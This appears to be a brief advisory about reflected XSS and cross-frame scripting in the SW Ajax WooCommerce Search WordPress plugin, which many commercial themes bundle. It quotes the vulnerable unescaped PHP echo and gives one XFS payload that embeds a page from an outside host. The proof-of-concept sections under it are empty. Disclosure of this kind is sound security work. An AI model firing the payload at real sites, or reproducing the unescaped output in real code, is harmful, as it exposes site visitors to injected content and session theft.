An Unauthenticated Reflected XSS & XFS vulnerabilities were discovered in the SW Ajax WooCommerce Search plugin v1.2.6 for WordPress.
The plugin comes with a number of commercial themes such as: OneMall, Revo, eMarket, Autusin, Market, MaxShop, ShoppyStore, Furnicom, EtroStore, HiTheme, StyleShop, TopDeal, Victo, Avesa, Soaz, Binace, Houskit, Gaion, Furniki, Rozy, SecretSho, BosMarket, Siezz, HiStore, Ecomart, iMarket, NeoMarket, 9Merry, LeVogue, Floris, Alishop, KONStore, ShopyMall, DresShop, Shop4U, FurniHome, Tech8 and the vendor is releasing new versions with the updated plugin in them.
Proof of Concept
<input class="autosearch-input" type="text" value="<?php echo ( ( isset( $_GET['s'] ) && $_GET['s'] ) ? ( $_GET['s'] ) : "" ); ?>" size="50" autocomplete="off" placeholder="<?php echo esc_attr__( 'Search Item...', 'sw_ajax_woocommerce_search' ); ?>" name="s">
[$] :: Payloads:
XFS: "><embed src="https://ex-mi.ru/payload/xfsii.html">
[!] :: PoC Unauthenticated Reflected XSS:
[!] :: PoC Unauthenticated XFS: